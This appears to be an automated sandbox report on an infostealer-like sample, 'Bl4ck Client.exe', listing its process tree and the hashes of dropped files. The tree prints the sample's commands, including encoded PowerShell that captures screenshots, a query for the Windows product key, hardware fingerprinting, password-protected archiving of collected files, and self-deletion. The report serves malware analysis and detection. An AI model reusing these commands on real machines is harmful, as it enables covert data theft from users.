ZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3388 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m01spxuq\m01spxuq.cmdline"5⤵PID:2608
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4585.tmp" "c:\Users\Admin\AppData\Local\Temp\m01spxuq\CSC716C66F4F9C249B4BCB65CBF505372C6.TMP"6⤵PID:2896
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4468
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3644
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4444
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:3048 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4004
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4400
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4404 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2764
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1508
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4472
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2940 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:5004
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1972
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4444
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:3396
-
C:\Windows\system32\getmac.exegetmac4⤵PID:2228
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI30122\rar.exe a -r -hp"b" "C:\Users\Admin\AppData\Local\Temp\fBqKT.zip" *"3⤵PID:3832
-
C:\Users\Admin\AppData\Local\Temp\_MEI30122\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI30122\rar.exe a -r -hp"b" "C:\Users\Admin\AppData\Local\Temp\fBqKT.zip" *4⤵
- Executes dropped EXE
PID:2720 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:2852
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:4696
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:1988
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:552
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4880
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:4464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3188 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:916
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:3664
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Bl4ck Client.exe""3⤵PID:2260
-
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- Runs ping.exe
PID:2724
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3700
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714135575.txt1⤵
- Opens file in notepad (likely ransom note)
PID:4804
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\jusched.log1⤵
- Opens file in notepad (likely ransom note)
PID:4016
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jawshtml.html1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1424 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc7c1446f8,0x7ffc7c144708,0x7ffc7c1447182⤵PID:4452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:22⤵PID:2028
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3760 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:82⤵PID:4060
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:4836
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:3048
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:82⤵PID:4548
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,8892266267322934035,13108100439131192278,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4492
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4728
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4228
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
152B
MD5b2a1398f937474c51a48b347387ee36a
SHA1922a8567f09e68a04233e84e5919043034635949
SHA2562dc0bf08246ddd5a32288c895d676017578d792349ca437b1b36e7b2f0ade6d6
SHA5124a660c0549f7a850e07d8d36dab33121af02a7bd7e9b2f0137930b4c8cd89b6c5630e408f882684e6935dcb0d5cb5e01a854950eeda252a4881458cafcc7ef7c
-
Filesize
152B
MD51ac52e2503cc26baee4322f02f5b8d9c
SHA138e0cee911f5f2a24888a64780ffdf6fa72207c8
SHA256f65058c6f1a745b37a64d4c97a8e8ee940210273130cec97a67f568088b5d4d4
SHA5127670d606bc5197ecb7db3ddaecd6f74a80e6decae92b94e0e8145a7f463fa099058e89f9dfa1c45b9197c36e5e21994698186a2ec970bbdb0937fe28ca46a834
-
Filesize
5KB
MD5a11b6ceaffa5f5548eb1cf423e0769b4
SHA12a01a2c7b88decbf309c0f50b7f9b33110ec73c7
SHA25689bfa38a0484978f9458e71c759bb646a47e2f16b8b982b8dd8a031295cf4df0
SHA51277a3081e1462fd5577169dc9ae07ccf49624a763c6135e845bbe8a20c4b3f625015d284fe18a8cbff0bef74432bbf2dffe92b6d1d2a2f216e8989a77e3c47897
-
Filesize
6KB
MD5914cb1c2c1a4c28bef533b88708879e4
SHA1647a79ea35bf41804fde94d5bc647f0701dfcdbf
SHA256a29dea40ee79dcda4d2866fe2e0bc72d31a51d63f624408b73431d5c98eca5e8
SHA51295175d63b54fa22e6d1e900806a7c0b6801f8d58986963c1072992bba699365edc58e0b5cff30a506ac1dda9ac9f7c5389a42a7abf878701a8692cd490873d8f
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD52d88482b5777feef2f6bfaf5d59a87d5
SHA126b2ea09ec51f30fea68e2246ed4dfca346c2732
SHA256368426985d2bc318dff0e30afa4631de76e13ee6cfdc5570ffe1e86e58ff07d5
SHA512e02934945f20c71764a893b503401df593d8bf3490e5d7b0845644fff28611f373b75739bc65175d650daa4ae3f521e7e9a5a30e50a96f7693d1181ae3dcda73
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
1KB
MD5b736b1cf455023520eb7abb7f35ddaa2
SHA1f3d04d1c5d14eb92c1e466ee4767ea65680b4070
SHA2563530522d67a50208cbc38ada3fc1ce9c3f858488e1573e2cf1da6748040b8849
SHA5125bff0ecabba8d72a06456a54911e623e519b4ed78d21e32de94cfae5e21636f46e5134c95abd184b43fec7fd2fd0a12087a330eb3cd41cb5507db4a1996c5158
-
Filesize
1KB
MD52b474f72e9491bba41bfa970f5f5b832
SHA14c637d9e7c3a900a298c80a29a75cc20cc8b1892
SHA256f71cc7ca2d9276fc79352f6a4dc2bba8942d37da050614793eee32e3886bce5c
SHA512979fa8f87dd77cc863e0d6eb555fc82f3d404554acab3d63a762dba3a62bd946336265c6bc0a34e7c3b5a02baf72234fc4cdf77925bbf6123e09af4478e945ce
-
Filesize
106KB
MD5870fea4e961e2fbd00110d3783e529be
SHA1a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA25676fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA5120b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88
-
Filesize
46KB
MD593fe6d3a67b46370565db12a9969d776
SHA1ff520df8c24ed8aa6567dd0141ef65c4ea00903b
SHA25692ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b
SHA5125c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac
-
Filesize
56KB
MD5813fc3981cae89a4f93bf7336d3dc5ef
SHA1daff28bcd155a84e55d2603be07ca57e3934a0de
SHA2564ac7fb7b354069e71ebf7fcc193c0f99af559010a0ad82a03b49a92deb0f4d06
SHA512ce93f21b315d96fde96517a7e13f66aa840d4ad1c6e69e68389e235e43581ad543095582ebcb9d2c6dda11c17851b88f5b1ed1d59d354578fe27e7299bbea1cc
-
Filesize
103KB
MD5f65d2fed5417feb5fa8c48f106e6caf7
SHA19260b1535bb811183c9789c23ddd684a9425ffaa
SHA256574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8
SHA512030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab
-
Filesize
33KB
MD54ae75c47dbdebaa16a596f31b27abd9e
SHA1a11f963139c715921dedd24bc957ab6d14788c34
SHA2562308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d
SHA512e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8
-
Filesize
84KB
MD56f810f46f308f7c6ccddca45d8f50039
SHA16ee24ff6d1c95ba67e1275bb82b9d539a7f56cea
SHA25639497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76
SHA512c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878
-
Filesize
24KB
MD50e7612fc1a1fad5a829d4e25cfa87c4f
SHA13db2d6274ce3dbe3dbb00d799963df8c3046a1d6
SHA2569f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8
SHA51252c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517
-
Filesize
41KB
MD57a31bc84c0385590e5a01c4cbe3865c3
SHA177c4121abe6e134660575d9015308e4b76c69d7c
SHA2565614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36
